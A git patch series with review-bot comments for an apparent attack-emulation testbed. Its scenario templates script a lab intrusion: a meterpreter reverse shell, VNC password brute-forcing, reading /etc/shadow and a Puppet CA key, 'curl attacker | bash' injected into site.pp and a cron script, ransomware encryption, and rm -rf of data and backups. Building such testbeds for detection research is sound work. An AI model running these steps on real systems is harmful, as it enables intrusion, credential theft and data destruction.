From 74e47f81bd0902c99af9f23d9e6a7e95baebc2b2 Mon Sep 17 00:00:00 2001
From: thorinaboenke
Date: Fri, 12 Dec 2025 13:28:26 +0100
Subject: [PATCH 1/8] fix ssh command via admin server

---
 ansible/run/scenario3/main.yml | 76 ++++++++++++++++++-
 .../run/scenario3/templates/scenario_3_a_c.j2 | 20 ++---
 2 files changed, 77 insertions(+), 19 deletions(-)

diff --git a/ansible/run/scenario3/main.yml b/ansible/run/scenario3/main.yml
index 0c7dedb9..db317c0d 100644
--- a/ansible/run/scenario3/main.yml
+++ b/ansible/run/scenario3/main.yml
@@ -39,16 +39,84 @@ - attackmate - playbooks - - name: Ensure delay before commands - ansible.builtin.replace: + - name: Add cmd_config block to end of /etc/attackmate.yml + ansible.builtin.blockinfile: path: /etc/attackmate.yml - regexp: 'command_delay: 0' - replace: 'command_delay: 15' + block: | + cmd_config: + command_delay: 15 + create: true # Creates the file if it doesn't exist backup: yes + insertafter: EOF + marker: "# {mark} ANSIBLE MANAGED BLOCK FOR CMD_CONFIG" become: true tags: - playbooks + +# this is the key needed for scenario a_c when mgmt is used as jump host + - name: Generate SSH key pair for attacker to access mgmt + ansible.builtin.openssh_keypair: + path: "{{ user_home.stdout }}/.ssh/attacker_mgmt" + type: rsa + size: 4096 + owner: "{{ attacker_user }}" + group: "{{ attacker_user }}" + mode: '0600' + tags: + - ssh + - playbooks + + - name: Read SSH public key from attacker + become: yes + ansible.builtin.slurp: + src: "{{ user_home.stdout }}/.ssh/attacker_mgmt.pub" + register: ssh_key_mgmt + tags: + - ssh + - playbooks + + - name: Add public key to mgmt's authorized_keys + become: yes + ansible.builtin.authorized_key: + user: aecid + state: present + key: "{{ ssh_key_mgmt.content | b64decode }}" + delegate_to: mgmt + tags: + - ssh + - playbooks + + - name: Set attacker_mgmt_public_key as a fact + ansible.builtin.set_fact: + attacker_mgmt_public_key: "{{ ssh_key_mgmt.content | b64decode }}" + tags: + - ssh + - playbooks + +- name: add ssh key to adminpc2 + hosts: adminpc2 + become: true + tasks: + - name: Add public key to adminpcs's authorized_keys + become: yes + ansible.builtin.authorized_key: + user: aecid + state: present + key: "{{ hostvars['attacker']['attacker_mgmt_public_key'] }}" + tags: + - ssh + - playbooks + +- name: Install Attacker Host Part 2 + hosts: attacker + become: true + vars: + attacker_user: aecid + attacker_ip: 192.42.1.174 + delay_before_attack: 600 + tasks: + - name: Copy user-password-combo ansible.builtin.copy: 
src: user_pass_combo.txt diff --git a/ansible/run/scenario3/templates/scenario_3_a_c.j2 b/ansible/run/scenario3/templates/scenario_3_a_c.j2 index 49dfffd1..b0306939 100644 --- a/ansible/run/scenario3/templates/scenario_3_a_c.j2 +++ b/ansible/run/scenario3/templates/scenario_3_a_c.j2 @@ -7,7 +7,8 @@ vars: $SERVER_ADDRESS: fw.attackbed.com $ATTACKER_ADDRESS: 192.42.1.174 $DNS_SERVER: 192.42.0.233 - $ADMIN_SERVER: 10.12.0.222 + $ADMIN_SERVER: 10.12.0.223 + $MGMT_IP: 192.42.0.201 commands: - type: shell @@ -256,11 +257,6 @@ commands: cmd: "cd /var/www/html/debian/\n" interactive: True -# - type: ssh -# session: foothold -# cmd: "rm healthcheckd_1.0-1_amd64.deb\n" -# interactive: True - - type: ssh session: foothold cmd: "dpkg-scanpackages . | gzip -c9 > Packages.gz\n" @@ -270,15 +266,9 @@ commands: tactics: "Execution,Lateral Movement" technique_name: "Software Deployment Tools" - - - type: ssh - cmd: echo "ssh -i .ssh/rootkey -o StrictHostKeyChecking=no root@192.168.100.23 \"apt update && apt install -y healthcheckd\"" | at now + 2 minute - hostname: $ADMIN_SERVER - username: aecid - password: aecid - jmp_hostname: 192.42.2.42 - clear_cache: True - exit_on_error: False + # connect via jumphost to admin host, that ssh to linuxshare + - type: shell + cmd: ssh -i ~/.ssh/attacker_mgmt -o StrictHostKeyChecking=no -o "ProxyCommand=ssh -i ~/.ssh/attacker_mgmt -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -W %h:%p aecid@$MGMT_IP" aecid@10.12.0.223 'echo "ssh -i .ssh/rootkey -o StrictHostKeyChecking=no root@192.168.100.23 '\''apt update && apt install -y healthcheckd'\''" | at now + 2 minute' metadata: delayed_manifestation: "120s" From 3e23687ad35f4d948dd4f21a87e6bf8a7253cab5 Mon Sep 17 00:00:00 2001 
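Review bot: The new blockinfile task appends a top-level `cmd_config:` mapping at EOF, whereas the task it replaces edited an existing `command_delay: 0` in place; if /etc/attackmate.yml already declares a `cmd_config:` mapping holding that key (which the old regexp suggests, but the file is not visible here), the result has two `cmd_config` keys, which most YAML loaders resolve silently as last-wins while the spec treats it as invalid — worth confirming against the deployed config before relying on `command_delay: 15` taking effect. The same replacement appears in the scenario4 main.yml hunk of patch 5. The key installed by `Add public key to mgmt's authorized_keys` is only used as a ProxyCommand hop (`-W %h:%p` in the scenario_3_a_c template), so that task could limit it with `key_options: 'restrict,port-forwarding'` instead of granting an unrestricted login on mgmt. Truthiness is mixed across the new tasks (`backup: yes`, `become: yes` next to `become: true`); yamllint's truthy rule wants `true`. The play enclosing the first part of this hunk starts above it.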
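Review bot: The replacement shell command hard-codes `aecid@10.12.0.223` even though the vars hunk of this same patch sets `$ADMIN_SERVER: 10.12.0.223`, so the two will drift the next time the admin host address changes; use `aecid@$ADMIN_SERVER` there. The outer hop passes `-o StrictHostKeyChecking=no` but, unlike the ProxyCommand hop, no `-o UserKnownHostsFile=/dev/null`, so a rebuilt admin host with a new host key will trigger a host-key-changed warning on later runs — presumably unintended, given the inner hop already discards known_hosts. Since `$MGMT_IP` is deployment-specific, this template could carry the same `# YOU NEED TO ENTER YOUR MGMT_IP FOR YOUR SETUP!` banner that patch 8 adds to the scenario 1 templates. The `commands:` list this entry belongs to starts above the hunk.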
From: thorinaboenke Date: Fri, 12 Dec 2025 13:29:25 +0100 Subject: [PATCH 2/8] version unattended upgrades in testbed repo --- packer/linuxshare/playbook/requirements.yml | 2 +- packer/repository/playbook/requirements.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/packer/linuxshare/playbook/requirements.yml b/packer/linuxshare/playbook/requirements.yml index 25511438..c8d9f7b4 100644 --- a/packer/linuxshare/playbook/requirements.yml +++ b/packer/linuxshare/playbook/requirements.yml @@ -1,6 +1,6 @@ roles: - src: https://github.com/ait-testbed/ansible-manage_unattended_upgrades.git - version: v1.0.0 + version: v0.0.0 name: manage_unattended_upgrades - src: https://github.com/ait-testbed/ansible-auditd.git version: v1.1 diff --git a/packer/repository/playbook/requirements.yml b/packer/repository/playbook/requirements.yml index 043de313..21861879 100644 --- a/packer/repository/playbook/requirements.yml +++ b/packer/repository/playbook/requirements.yml @@ -1,6 +1,6 @@ roles: - src: https://github.com/ait-testbed/ansible-manage_unattended_upgrades.git - version: v1.0.0 + version: v0.0.0 name: manage_unattended_upgrades - src: https://github.com/ait-testbed/ansible-auditd.git version: v1.1 From 443c3a6757f7ad1e42a03b019f225767bd249166 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Tue, 16 Dec 2025 11:09:20 +0100 Subject: [PATCH 3/8] add sceanrio d_a tag to playbook scenario1 --- ansible/run/scenario1/main.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ansible/run/scenario1/main.yml b/ansible/run/scenario1/main.yml index bfac156f..de8f29f8 100644 --- a/ansible/run/scenario1/main.yml +++ b/ansible/run/scenario1/main.yml @@ -156,6 +156,7 @@ owner: "root" mode: "0755" tags: + - scenario_1_d_a - scenario_1_e_a - scenario_1_c_a From 8fcf4494eee1801c206b15118082f51ca8ddd790 Mon Sep 17 00:00:00 2001 
From: thorinaboenke Date: Tue, 16 Dec 2025 11:12:59 +0100 Subject: [PATCH 4/8] add action metadata, use correct session in 3_b_d --- .gitignore | 2 + .../run/scenario3/templates/scenario_3_b_a.j2 | 13 +- .../run/scenario3/templates/scenario_3_b_b.j2 | 12 +- .../run/scenario3/templates/scenario_3_b_d.j2 | 351 ++++++++++++++++++ 4 files changed, 376 insertions(+), 2 deletions(-) create mode 100644 ansible/run/scenario3/templates/scenario_3_b_d.j2 diff --git a/.gitignore b/.gitignore index b9c32140..939fa14e 100644 --- a/.gitignore +++ b/.gitignore @@ -2,6 +2,7 @@ roles/ venv/ .venv/ .venv/* +ansible/.venv* .env .terragrunt-cache/ .terraform.lock.hcl @@ -10,6 +11,7 @@ docs/build/ *.qcow2 .mypy_cache/ *.tfstate +*tar.gz # temporary packer-key(debug) os_builder.pem diff --git a/ansible/run/scenario3/templates/scenario_3_b_a.j2 b/ansible/run/scenario3/templates/scenario_3_b_a.j2 index b8850519..7d20ca84 100644 --- a/ansible/run/scenario3/templates/scenario_3_b_a.j2 +++ b/ansible/run/scenario3/templates/scenario_3_b_a.j2 @@ -5,7 +5,7 @@ #################### # for vnc connection to the display, tunnel with : ssh -J aecid@ -L 5901:172.17.100.122:5901 aecid@172.17.100.122 -# then vncviewer localhost:5091 +# then vncviewer localhost:5901 vars: $SERVER_ADDRESS: fw.attackbed.com @@ -87,6 +87,7 @@ commands: techniques: "T1021.005" tactics: "Lateral Movement" technique_name: "Remote Services: VNC" + action: "terminal" - type: sleep seconds: 3 @@ -107,6 +108,7 @@ commands: techniques: "T1021.005" tactics: "Lateral Movement" technique_name: "Remote Services: VNC" + action: "sudo -i" - type: sleep seconds: 3 @@ -124,6 +126,8 @@ commands: session: foothold cmd: type input: "id" + metadata: + action: "id" - type: sleep seconds: 3 @@ -141,6 +145,8 @@ commands: session: foothold cmd: type input: "cat /etc/shadow" + metadata: + action: "cat /etc/shadow" - type: sleep seconds: 3 
@@ -162,6 +168,8 @@ commands: session: foothold cmd: type input: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem" + metadata: + action: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem" - type: sleep seconds: 3 @@ -183,6 +191,8 @@ commands: session: foothold cmd: type input: "cat /media/share/healthcheck_cron.sh" + metadata: + action: "cat /media/share/healthcheck_cron.sh" - type: sleep seconds: 3 @@ -208,6 +218,7 @@ commands: techniques: "T1105,T1059.004,T1053.003,T1021.005,T1071.001" tactics: "Execution,Defense Evasion,Persistence,Command and Control" technique_name: "Ingress Tool Transfer,Command and Scripting Interpreter: Unix Shell,Scheduled Task/Job: Cron,Remote Services: VNC,Application Layer Protocol: Web Protocols" + action: "echo 'curl http://$ATTACKER_ADDRESS:8888/install.sh | bash' >> /media/share/healthcheck_cron.sh" - type: sleep seconds: 2 diff --git a/ansible/run/scenario3/templates/scenario_3_b_b.j2 b/ansible/run/scenario3/templates/scenario_3_b_b.j2 index 21ffa352..e3fcdd6b 100644 --- a/ansible/run/scenario3/templates/scenario_3_b_b.j2 +++ b/ansible/run/scenario3/templates/scenario_3_b_b.j2 @@ -88,6 +88,7 @@ commands: techniques: "T1021.005" tactics: "Lateral Movement" technique_name: "Remote Services: VNC" + action: "terminal" - type: sleep seconds: 3 @@ -108,6 +109,7 @@ commands: techniques: "T1021.005" tactics: "Lateral Movement" technique_name: "Remote Services: VNC" + action: "sudo -i" - type: sleep seconds: 3 @@ -125,6 +127,8 @@ commands: session: foothold cmd: type input: "id" + metadata: + action: "id" - type: sleep seconds: 3 @@ -142,6 +146,8 @@ commands: session: foothold cmd: type input: "cat /etc/shadow" + metadata: + action: "cat /etc/shadow" - type: sleep seconds: 3 @@ -163,6 +169,8 @@ commands: session: foothold cmd: type input: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem" + metadata: + action: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem" - type: sleep seconds: 3 
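Review bot: The new `action` metadata is placed inconsistently within this file: for `terminal` and `sudo -i` it is added next to the existing `techniques`/`tactics` entries on the `cmd: type` command, while for `id`, `cat /etc/shadow`, the CA key and the cron script it becomes a metadata block of its own on the `type` command, with the technique metadata (as far as the new scenario_3_b_d template shows for the same steps) sitting on the following `key: enter` command. A consumer that joins action and technique per command will then see them on different entries; either attach `action` to the same command that carries the technique, or add a file-level comment stating that `type` carries the action and `enter` the technique. The scenario_3_b_b hunks use the same layout.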
@@ -184,6 +192,8 @@ commands: session: foothold cmd: type input: "cat /media/share/healthcheck_cron.sh" + metadata: + action: "cat /media/share/healthcheck_cron.sh" - type: sleep seconds: 3 @@ -198,7 +208,7 @@ commands: technique_name: "Data from Network Shared Drive" - type: sleep - seconds: 2 + seconds: 2 # HERE THE REVERSE SHELL FOR PORTFORWARDING ON THE REPOSERVER IS ESTABLISHED - type: vnc diff --git a/ansible/run/scenario3/templates/scenario_3_b_d.j2 b/ansible/run/scenario3/templates/scenario_3_b_d.j2 new file mode 100644 index 00000000..ac823fec --- /dev/null +++ b/ansible/run/scenario3/templates/scenario_3_b_d.j2 
@@ -0,0 +1,351 @@ +#################### +# +# Scenario 3 b d +# +#################### + +# for vnc connection to the display, tunnel with : ssh -J aecid@ -L 5901:172.17.100.122:5901 aecid@172.17.100.122 +# then vncviewer localhost:5901 + +vars: + $SERVER_ADDRESS: fw.attackbed.com + $ATTACKER_ADDRESS: 192.42.1.174 + $LISTA: + - "password1" + - "password2" + - "password3" + - "password4" + - "password5" + - "123" + - "12345" + - "12345678" + +commands: + +### PREPARE THE REVERSE SHELL FOR THE REPOSERVER + - type: mktemp + cmd: file + variable: RSHELL + + - type: msf-payload + cmd: cmd/unix/python/meterpreter/reverse_tcp + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + local_path: $RSHELL + + - type: msf-module + creates_session: movement + cmd: exploit/multi/handler + payload: "cmd/unix/python/meterpreter/reverse_tcp" + payload_options: + LHOST: $ATTACKER_ADDRESS + LPORT: "4444" + background: true + kill_on_exit: true + + - type: webserv + local_path: $RSHELL + port: 8888 + background: True + kill_on_exit: true + + +### BRUTEFORCE VNC + - type: loop + break_if: $RESULT_STDOUT =~ vnc_connected + cmd: "items(LISTA)" + commands: + - type: vnc + creates_session: foothold + username: john + password: $LOOP_ITEM + hostname: $SERVER_ADDRESS + port: "5901" + cmd: move + x: 5 + y: 5 + metadata: + techniques: "T1110.001,T1021.005" + tactics: "Credential Access, Lateral Movement" + technique_name: "Brute Force: Password Guessing,Remote Services: VNC" + + - type: vnc + session: foothold + cmd: click + metadata: + techniques: "T1021.005" + tactics: "Lateral Movement" + technique_name: "Remote Services: VNC" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: type + input: "terminal" + metadata: + techniques: "T1021.005" + tactics: "Lateral Movement" + technique_name: "Remote Services: VNC" + action: "terminal" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + + - type: sleep + seconds: 3 + + - type: 
vnc + session: foothold + cmd: type + input: "sudo -i" + metadata: + techniques: "T1078.003" + tactics: "Privilege Escalation" + technique_name: "Valid Accounts: Local Accounts" + action: "sudo -i" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + + - type: vnc + session: foothold + cmd: type + input: "sudo -i" + metadata: + techniques: "T1078.003" + tactics: "Privilege Escalation" + technique_name: "Valid Accounts: Local Accounts" + action: "sudo -i" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + + - type: sleep + seconds: 2 + +#id + - type: vnc + session: foothold + cmd: type + input: "id" + metadata: + action: "id" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + + - type: sleep + seconds: 2 + +#cat etc/shadow + - type: vnc + session: foothold + cmd: type + input: "cat /etc/shadow" + metadata: + action: "cat /etc/shadow" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + metadata: + techniques: "T1003.008" + tactics: "Credential Access" + technique_name: "OS Credential Dumping: /etc/passwd and /etc/shadow" + + - type: sleep + seconds: 2 + +#cat certificates + - type: vnc + session: foothold + cmd: type + input: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem" + metadata: + action: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + metadata: + techniques: "T1213" + tactics: "Collection" + technique_name: "Data from Information Repositories" + + - type: sleep + seconds: 2 + +#cat healthcheck cron + - type: vnc + session: foothold + cmd: type + input: "cat /media/share/healthcheck_cron.sh" + metadata: + action: "cat /media/share/healthcheck_cron.sh" + + - type: sleep + seconds: 3 + + - type: vnc + session: foothold + cmd: key + key: "enter" + metadata: + techniques: "T1039" + tactics: 
"Collection" + technique_name: "Data from Network Shared Drive" + + - type: sleep + seconds: 2 + +# HERE THE LATERAL MOVEMENT TAKES PLACE + + - type: vnc + session: foothold + cmd: type + input: "echo -e \"\\nclass blah2 {\\n exec { \\\"curl http://192.42.1.174:88" + metadata: + action: "modifying site.pp" + + - type: sleep + seconds: 2 + + - type: vnc + session: foothold + cmd: type + input: "88/install.sh | bash\\\":\\n path => ['/usr/bin','/bin']\\n }\\n}\\n\\nnode 'linuxshare.attack" + metadata: + action: "modifying site.pp" + + - type: sleep + seconds: 2 + + - type: vnc + session: foothold + cmd: type + input: "bed.local' {\\n class { 'blah2': }\\n}\\n\" >> /etc/puppetlabs/code/environments/production/manifests/site.pp" + metadata: + action: "modifying site.pp" + + - type: sleep + seconds: 2 + + - type: vnc + session: foothold + cmd: key + key: "enter" + metadata: + techniques: "T1072,T1105,T1059.004" + tactics: "Execution, Lateral Movement" + technique_name: "Software Deployment Tools,Ingress Tool Transfer,Command and Scripting Interpreter: Unix Shell" + +#################### MOVED ################################ + - type: msf-session + session: movement + cmd: shell + + # Prepare for upgradeshell + - type: setvar + cmd: movement + variable: $UPGRADESESSION + + - type: include + local_path: upgrade.yml + + - type: msf-session + session: movement + cmd: curl http://$ATTACKER_ADDRESS/donotcry > /opt/donotcry + metadata: + techniques: "T1486,T1105" + tactics: "Impact,Command and Control" + technique_name: "Data Encrypted for Impact, Ingress Tool Transfer" + + - type: msf-session + session: movement + cmd: /lib64/ld-linux-x86-64.so.2 /opt/donotcry encrypt /media/data/Images + metadata: + techniques: "T1486,T1565.001" + tactics: "Impact" + technique_name: "Data Encrypted for Impact, Data Manipulation: Stored Data Manipulation" + + - type: msf-session + session: movement + cmd: find /media/data/Images + metadata: + techniques: "T1018" + tactics: "Discovery" + 
technique_name: "Remote System Discovery" + + - type: msf-session + session: movement + cmd: cat /etc/passwd + metadata: + techniques: "T1087.001" + tactics: "Discovery" + technique_name: "Account Discovery: Local Account" + + - type: msf-session + session: movement + cmd: userdel -f john + metadata: + techniques: "T1531" + tactics: "Impact" + technique_name: "Account Access Removal" + + - type: msf-session + session: movement + cmd: rm -rf /media/data/* + metadata: + techniques: "T1485" + tactics: "Impact" + technique_name: "Data Destruction" + + - type: msf-session + session: movement + cmd: rm -rf /var/backups/* + metadata: + techniques: "T1490" + tactics: "Impact" + technique_name: "Inhibit System Recovery" + + - type: msf-session + session: movement + cmd: systemctl stop exim4.service + metadata: + techniques: "T1489" + tactics: "Impact" + technique_name: "Service Stop" + + - type: sleep + seconds: 30 From 9d0261a9b5946939b20415573bb3f29be3d3a385 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Tue, 16 Dec 2025 11:13:27 +0100 Subject: [PATCH 5/8] correct comand delay scenario4 --- ansible/run/scenario4/main.yml | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/ansible/run/scenario4/main.yml b/ansible/run/scenario4/main.yml index effc089d..a59ee3ac 100644 --- a/ansible/run/scenario4/main.yml +++ b/ansible/run/scenario4/main.yml @@ -42,12 +42,16 @@ tags: - playbooks - - name: Ensure delay before commands - ansible.builtin.replace: + - name: Add cmd_config block to end of /etc/attackmate.yml + ansible.builtin.blockinfile: path: /etc/attackmate.yml - regexp: 'command_delay: 0' - replace: 'command_delay: 15' + block: | + cmd_config: + command_delay: 15 + create: true # Creates the file if it doesn't exist backup: yes + insertafter: EOF + marker: "# {mark} ANSIBLE MANAGED BLOCK FOR CMD_CONFIG" become: true tags: - playbooks From 49b9db2c9325023bd9cd3901e77308e937b607c1 Mon Sep 17 00:00:00 2001 
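Review bot: The site.pp payload typed under `# HERE THE LATERAL MOVEMENT TAKES PLACE` embeds the attacker address as the literal `192.42.1.174`, split across two `input:` strings (`...curl http://192.42.1.174:88` and `88/install.sh ...`), although the file defines `$ATTACKER_ADDRESS` for exactly this value; if the split is what prevents using the variable, a comment saying so would keep the next editor from changing the var and missing this copy. `sudo -i` is typed and submitted twice in a row under identical `Valid Accounts: Local Accounts` metadata; if the repetition is deliberate, say so in a comment, otherwise the second block looks like a copy-paste leftover. Boolean spelling is mixed (`background: True` on the webserv command, `background: true` on msf-module); pick `true`. The `#################### MOVED ####` banner says neither where the following block was moved from nor why — replace it with a sentence naming the original step.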
From: thorinaboenke Date: Tue, 16 Dec 2025 11:13:50 +0100 Subject: [PATCH 6/8] add sleeps scenario4 --- ansible/run/scenario4/templates/scenario_4.j2 | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/ansible/run/scenario4/templates/scenario_4.j2 b/ansible/run/scenario4/templates/scenario_4.j2 index b5359dfe..2dae2320 100644 --- a/ansible/run/scenario4/templates/scenario_4.j2 +++ b/ansible/run/scenario4/templates/scenario_4.j2 @@ -41,6 +41,9 @@ commands: tactics: "Initial Access,Lateral Movement,Defense Evasion" technique_name: "Valid Accounts: Local Accounts,Ingress Tool Transfer,Traffic Signaling: Port Knocking" + - type: sleep + seconds: 10 + - type: ssh creates_session: "foothold" username: john @@ -53,6 +56,9 @@ commands: tactics: "Initial Access" technique_name: "Valid Accounts: Local Accounts" + - type: sleep + seconds: 10 + - type: ssh session: foothold cmd: "ssh -o StrictHostKeyChecking=no -o PreferredAuthentications=password john@$FIREWALL_ADDRESS\n" @@ -61,9 +67,9 @@ commands: techniques: "T1078.003" tactics: "Lateral Movement" technique_name: "Valid Accounts: Local Accounts" - + - type: sleep - seconds: 2 + seconds: 10 - type: ssh session: foothold From e8f1876aab63b3728d659945466e2d7dca778368 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Tue, 16 Dec 2025 11:15:25 +0100 Subject: [PATCH 7/8] up filebeat version --- ansible/run/upgrade-attacker/requirements.yml | 2 +- packer/corpdns/playbook/requirements.yml | 2 +- packer/firewall/playbook/requirements.yml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/ansible/run/upgrade-attacker/requirements.yml b/ansible/run/upgrade-attacker/requirements.yml index ed9656b0..e0b259b0 100644 --- a/ansible/run/upgrade-attacker/requirements.yml +++ b/ansible/run/upgrade-attacker/requirements.yml 
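Review bot: The three `seconds: 10` sleeps added around the foothold ssh steps in scenario_4.j2 carry no explanation of what each one waits for, and the existing value was raised from 2 without a note on why; a one-line comment above each, e.g. `# give the target time to accept the next session`, would record the intent (this is my inference from the surrounding `Port Knocking` and `Valid Accounts` metadata — adjust to the real reason). If the delay is tuned per setup, keeping the number in one place rather than three copies would also help.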
@@ -1,4 +1,4 @@ - - src: https://github.com/ait-cs-IaaS/ansible-mate-desktop.git + - src: https://github.com/ait-testbed/ansible-mate-desktop.git version: v1.2.1 name: mate-desktop - src: https://github.com/ait-testbed/atb-ansible-novnc.git diff --git a/packer/corpdns/playbook/requirements.yml b/packer/corpdns/playbook/requirements.yml index 93c04cbc..2aef9089 100644 --- a/packer/corpdns/playbook/requirements.yml +++ b/packer/corpdns/playbook/requirements.yml @@ -12,7 +12,7 @@ roles: version: v1.0.0 name: aeciduser - src: https://github.com/ait-testbed/atb-ansible-filebeat.git - version: v0.9.2 + version: v0.9.3 name: filebeat - src: https://github.com/ait-testbed/atb-ansible-aecidtools.git version: v1.1.0 diff --git a/packer/firewall/playbook/requirements.yml b/packer/firewall/playbook/requirements.yml index f0bcda16..f5f69f67 100644 --- a/packer/firewall/playbook/requirements.yml +++ b/packer/firewall/playbook/requirements.yml @@ -21,7 +21,7 @@ roles: version: v1.0.3 name: squidproxy - src: https://github.com/ait-testbed/atb-ansible-filebeat.git - version: v0.9.2 + version: v0.9.3 name: filebeat - src: https://github.com/ait-testbed/atb-ansible-aecidtools.git version: v1.1.0 From f93f707673d6092cd01971b0767bbe2a7fe082aa Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Tue, 16 Dec 2025 11:21:37 +0100 Subject: [PATCH 8/8] add comments --- ansible/run/scenario1/templates/scenario_1_c_a.j2 | 5 +++++ ansible/run/scenario1/templates/scenario_1_c_b.j2 | 5 +++++ ansible/run/scenario1/templates/scenario_1_c_c.j2 | 5 +++++ ansible/run/scenario1/templates/scenario_1_d_a.j2 | 5 +++++ ansible/run/scenario1/templates/scenario_1_e_b.j2 | 2 -- 5 files changed, 20 insertions(+), 2 deletions(-) diff --git a/ansible/run/scenario1/templates/scenario_1_c_a.j2 b/ansible/run/scenario1/templates/scenario_1_c_a.j2 index 9ba50969..edd38efe 100644 --- a/ansible/run/scenario1/templates/scenario_1_c_a.j2 +++ b/ansible/run/scenario1/templates/scenario_1_c_a.j2 
@@ -8,6 +8,11 @@ vars: $ATTACKER_ADDRESS: 192.42.1.174 $DNS_SERVER: 192.42.0.233 $ADMIN_SERVER: 10.12.0.222 + +################################################### +# YOU NEED TO ENTER YOUR MGMT_IP FOR YOUR SETUP! # +################################################### + $MGMT_IP: 192.42.0.201 $MGMT_USERNAME: aecid $DOMAIN: attackbed.com diff --git a/ansible/run/scenario1/templates/scenario_1_c_b.j2 b/ansible/run/scenario1/templates/scenario_1_c_b.j2 index a7e812df..dded44ff 100644 --- a/ansible/run/scenario1/templates/scenario_1_c_b.j2 +++ b/ansible/run/scenario1/templates/scenario_1_c_b.j2 @@ -8,6 +8,11 @@ vars: $ATTACKER_ADDRESS: 192.42.1.174 $DNS_SERVER: 192.42.0.233 $ADMIN_SERVER: 10.12.0.222 + +################################################### +# YOU NEED TO ENTER YOUR MGMT_IP FOR YOUR SETUP! # +################################################### + $MGMT_IP: 192.42.0.201 $MGMT_USERNAME: aecid $DOMAIN: attackbed.com diff --git a/ansible/run/scenario1/templates/scenario_1_c_c.j2 b/ansible/run/scenario1/templates/scenario_1_c_c.j2 index c20c5496..c43e1254 100644 --- a/ansible/run/scenario1/templates/scenario_1_c_c.j2 +++ b/ansible/run/scenario1/templates/scenario_1_c_c.j2 @@ -8,6 +8,11 @@ vars: $ATTACKER_ADDRESS: 192.42.1.174 $DNS_SERVER: 192.42.0.233 $ADMIN_SERVER: 10.12.0.222 + +################################################### +# YOU NEED TO ENTER YOUR MGMT_IP FOR YOUR SETUP! # +################################################### + $MGMT_IP: 192.42.0.201 $MGMT_USERNAME: aecid $DOMAIN: attackbed.com diff --git a/ansible/run/scenario1/templates/scenario_1_d_a.j2 b/ansible/run/scenario1/templates/scenario_1_d_a.j2 index dcb58efa..43ebb761 100644 --- a/ansible/run/scenario1/templates/scenario_1_d_a.j2 +++ b/ansible/run/scenario1/templates/scenario_1_d_a.j2 
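Review bot: The banner added above `$MGMT_IP` tells the operator to edit the value by hand, but the value stays the literal `192.42.0.201` copied into four templates (c_a, c_b, c_c here, d_a in the next hunk); since these are Jinja2 templates rendered by Ansible, rendering it from one host/inventory variable, e.g. `$MGMT_IP: "{{ mgmt_ip }}"` (variable name constructed as an example) with the banner moved to that variable's definition, would make the per-setup edit a single place — assuming such a variable is available to the template task. The same applies to `$MGMT_USERNAME`, and the scenario_3_a_c template touched in patch 1 carries the same literal without any banner.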
@@ -8,6 +8,11 @@ vars: $ATTACKER_ADDRESS: 192.42.1.174 $DNS_SERVER: 192.42.0.233 $ADMIN_SERVER: 10.12.0.222 + +################################################### +# YOU NEED TO ENTER YOUR MGMT_IP FOR YOUR SETUP! # +################################################### + $MGMT_IP: 192.42.0.201 $MGMT_USERNAME: aecid $DOMAIN: attackbed.com diff --git a/ansible/run/scenario1/templates/scenario_1_e_b.j2 b/ansible/run/scenario1/templates/scenario_1_e_b.j2 index 74a50ce2..842c65a1 100644 --- a/ansible/run/scenario1/templates/scenario_1_e_b.j2 +++ b/ansible/run/scenario1/templates/scenario_1_e_b.j2 @@ -8,8 +8,6 @@ vars: $ATTACKER_ADDRESS: 192.42.1.174 $DNS_SERVER: 192.42.0.233 $ADMIN_SERVER: 10.12.0.222 - $MGMT_IP: 192.42.0.201 - $MGMT_USERNAME: aecid $DOMAIN: attackbed.com $USER: aecid $DNS_LIST: /usr/local/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt